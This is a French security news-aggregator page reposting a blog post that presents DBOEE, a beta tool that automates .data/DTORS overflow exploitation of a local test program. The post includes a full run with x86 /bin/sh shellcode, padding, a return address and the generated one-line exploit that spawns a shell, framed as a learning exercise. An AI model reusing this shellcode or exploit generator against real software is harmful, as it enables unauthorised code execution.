|
|
|
.Data Overflow et utilisation de DBOEE pour générer l'exploit approprié et exploiter |
Si vous voulez bloquer ce service sur vos fils RSS
Si vous voulez nous contacter ou nous proposer un fil RSS
Menu > Articles de la revue de presse : - l'ensemble [ tous | francophone] - par mots clé [ tous] - par site [ tous] - le tagwall [ voir] - Top bi-hebdo de la revue de presse [ Voir]
.Data Overflow et utilisation de DBOEE pour générer l'exploit approprié et exploiter Par kmkz's blogLe [2009-05-31] à 19:52:55
Présentation : Salut a tous et a toutes . Dans ce nouveau billet , je compte vous présenter mon projet baptisé "DBOEE" (Data-Based-Overflow Easy Exploitation) dans sa version "beta" si on peu dire . Mais en quoi cela consiste -il ? En fait , ce billet sera ici un complément du précédent concernant les .Data Overflows . Le précédent billet m'a valut un commentaire de la part de quelqu'un ( il se reconnaitra j'espere ;-)) que j'admire me demandant "pourquoi tu n'as pas coder l'exploit qui va avec ?" . Cette question a pour réponse : pas envie de coder un exploit pour un vuln.c ( pas trés utile en soit) . Mais en y réfléchissant , pourquoi ne pas coder un programme qui , non seulement serait un exploit pour ce vuln.c, mais aussi serait adaptable a d'autres .Data Overflow ? De la est né le projet DBOEE ayant pour objectif ( dans la version beta tout du moins ) ,la possibilité de s'adapter a d'autre situations afin de pouvoir facilement exploiter et au passage générer l'exploit associé . Concrètement DBOEE vous demandera un shellcode (fournis au cas ou ..) , le nombre d'octets entre le buffer et la section DTORS a écraser ( j'automatiserais ça par la suite ) ainsi que la cible . Concernant le nombre d'octets , le programme le calcule en déduisant la taille du shellcode de façon a faciliter cette opération . Une fois l'exploit créé , il est sauvergardé dans le fichier Exploit.txt puis exploite le programme vulnérable. Voila pour la présentation du projet DBOEE qui n'en ait ici qu'a ses débuts ( voir readme joint a l'archive). Place au test : [kmkz@localhost Fuzzer_Data-overflow]$ ./DBOEE ---------------------------- - Data-Based-Overflow Easy Exploitation - ---------------------------- [+]Programm : -Devellopped by kmkz(c) -Compilation :gcc -o DBOEE DBOEE.c [+]Author's informations : kmkz's web sites - http://kmkz-web-blog.blogspot.com et www.collective-utopia.no-ip.fr [+]This programm has been coded for makes easier the Data based Overflow exploitation. You just have to give a shellcode(reached) , numbers of Bytes and the target name . DBOEE calculate the payload, exploit program and create feat ,nice isn't it.? [~]This is my first real projet in C language and Beta version also I hold has excuse me for essential lack ---------------------------****************--------------------------- ---------------------------STARTING PROGRAM--------------------------- [*] Enter Adress Return : "x60x95x04x08" [*] Enter your shellcode : "x31xc0x50x68//shx68/binx89xe3x50x53x89xe1x99xb0x0bx cdx80" ---------------------------Starting Exploitation--------------------------- [~]Program Running...... [~] check on the ongoing shellcode... - Shellcode maximum Size : 1000 - Shellcode character - 73 - Shellcode size (octets) - 18 ---------------------------Shellcode Created--------------------------- [*] enter the number of 'A' (octets) necessary for Overflow exploitation : 272 ---------------------------Shellcode Created--------------------------- [~]Generating Payload.... (+)[Your Payload is] -- 272 x 'A' [your shellcode] (+) subtraction of the shellcode bytes ... [*] Payload generated is : printf 254 x 'A' [shellcode] ---------------------------Payload Created--------------------------- [~] Give me a target (example- ./vuln) ./vuvu -Target programm is - ./vuvu ---------------------------Generating Exploit File--------------------------- [#] Creating Exploit File .... [#]Exploit.txt : success ! [+] Sending payload... ------------ Result ------------ sh-3.2$ ----------------------------------------------------------------------------------------------------------------------------------------------------------- -Contenu du Fichier Exploit.txt - ----------------------------------------------------------------------------------------------------------------------------------------------------------- `printf "x31xc0x50x68//shx68/binx89xe3x50x53x89xe1x99xb0x0bx cdx80"``perl -e 'print "A"x254'``printf "x60x95x04x08"` ----------------------------------------------------------------------------------------------------------------------------------------------------------- Comme on peu le constater , l'exploit généré correspond en tout points a celui obtenu lors du billet précédent. ----- Archive du projet DBOEE ----- Voila , le source est un peu (beaucoup ) plus présentable désormais grace a la participation de m_101 (que je remercie au passage ). Pour plus d'infos , consulter le "readme" inclu a l'archive. A trés bientot et merci a tous o ! ps2: Retrouver l'appel a participation au projet sur le forum Collective-Utopia []
Les mots clés de la revue de presse pour cet article : overflow
Les videos sur SecuObs pour les mots clés : overflow
Les éléments de la revue Twitter pour les mots clé : overflow
Les derniers articles du site "kmkz's blog" :
- Scite Text Editor 1.76 PoC Local BoF vulnerability 0 - Days
- Manifeste pour la création d'une organisation hacker en France
- Au commencement ....
- Utilisations avancées de Hping2
- Shellcode et Port Binder en ASM x86 32 Bits
- Local Stack Overflow Exploitation
- Création d'un meeting 2600 a Nimes 30
- Win. XP patched Local Privilèges Escalation
- Initiation aux bases du Reversing
- Return Into Libc
Menu > Articles de la revue de presse : - l'ensemble [ tous | francophone] - par mots clé [ tous] - par site [ tous] - le tagwall [ voir] - Top bi-hebdo de la revue de presse [ Voir]
Si vous voulez bloquer ce service sur vos fils RSS :
- avec iptables "iptables -A INPUT -s 88.191.75.173 --dport 80 -j DROP"
- avec ipfw et wipfw "ipfw add deny from 88.191.75.173 to any 80"
- Nous contacter par mail
| Mini-Tagwall des articles publiés sur SecuObs : | | | | sécurité, exploit, windows, attaque, outil, microsoft, réseau, audit, metasploit, vulnérabilité, système, virus, internet, usbsploit, données, source, linux, protocol, présentation, scanne, réseaux, scanner, bluetooth, conférence, reverse, shell, meterpreter, vista, rootkit, détection, mobile, security, malicieux, engineering, téléphone, paquet, trames, https, noyau, utilisant, intel, wishmaster, google, sysun, libre |
| Mini-Tagwall de l'annuaire video : | | | | curit, security, biomet, metasploit, biometric, cking, password, windows, botnet, defcon, tutorial, crypt, xploit, exploit, lockpicking, linux, attack, wireshark, vmware, rootkit, conference, network, shmoocon, backtrack, virus, conficker, elcom, etter, elcomsoft, server, meterpreter, openvpn, ettercap, openbs, iphone, shell, openbsd, iptables, securitytube, deepsec, source, office, systm, openssh, radio |
| Mini-Tagwall des articles de la revue de presse : | | | | security, microsoft, windows, hacker, attack, network, vulnerability, google, exploit, malware, internet, remote, iphone, server, inject, patch, apple, twitter, mobile, virus, ebook, facebook, vulnérabilité, crypt, source, linux, password, intel, research, virtual, phish, access, tutorial, trojan, social, privacy, firefox, adobe, overflow, office, cisco, conficker, botnet, pirate, sécurité |
| Mini-Tagwall des Tweets de la revue Twitter : | | | | security, linux, botnet, attack, metasploit, cisco, defcon, phish, exploit, google, inject, server, firewall, network, twitter, vmware, windows, microsoft, compliance, vulnerability, python, engineering, source, kernel, crypt, social, overflow, nessus, crack, hacker, virus, iphone, patch, virtual, javascript, malware, conficker, pentest, research, email, password, adobe, apache, proxy, backtrack |
|
|
|
|
|
